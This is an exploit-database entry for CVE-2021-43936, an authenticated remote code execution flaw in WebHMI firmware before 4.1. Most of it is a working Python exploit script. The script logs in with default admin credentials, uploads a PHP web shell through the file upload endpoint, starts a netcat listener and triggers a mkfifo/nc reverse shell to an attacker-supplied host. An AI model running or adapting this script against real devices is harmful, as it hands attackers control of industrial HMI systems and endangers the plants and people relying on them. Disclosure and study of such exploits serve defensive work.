WebHMI 4.0 Remote Code Execution

2021.12.13
Risk: High
Local: No
Remote: Yes
CWE: CWE-434


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated) # Date: 12/12/2021 # Exploit Author: Jeremiasz Pluta # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI Firmware < 4.1 # CVE: CVE-2021-43936 # Tested on: WebHMI Firmware 4.0.7475 #!/usr/bin/python import sys import re import argparse import pyfiglet import requests import time import subprocess banner = pyfiglet.figlet_format("CVE-2021-43936") print(banner) print('Exploit for CVE-2021-43936') print('For: WebHMI Firmware < 4.1') login = "admin" #CHANGE ME IF NEEDED password = "admin" #CHANGE ME IF NEEDED class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): payload = """<?php system($_GET['cmd']); ?>""" payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" headers_login = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'X-WH-LOGIN': login, 'X-WH-PASSWORD': password, 'X-Requested-With': 'XMLHttpRequest', 'Connection': 'close', 'Content-Length': '0' } url = 'http://' + target_ip + ':' + target_port r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url) time.sleep(3) print('[*] Trying to log in...') r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True) time.sleep(3) print('[*] Login redirection...') login_cookies = { 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'], 'X-WH-CHECK-TRIAL':'true', 'il18next':'en', } r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies) time.sleep(3) print('[*] Uploading cmd.php file...') files = { 'file': ('cmd.php', payload, 'application/x-php') } r4 = r.post(url + '/files.php', files=files, cookies=login_cookies) time.sleep(3) print('[*] Setting up netcat listener...') listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3) print('[*] Executing reverse shell...') print('[*] Watchout for shell! :)') r5 = r.get(url + '/uploads/files/cmd.php?cmd=' + payload2, cookies=login_cookies) if (r5.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='WebHMI Firmware <4.1 Unrestricted File Upload + Code Execution (Authenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top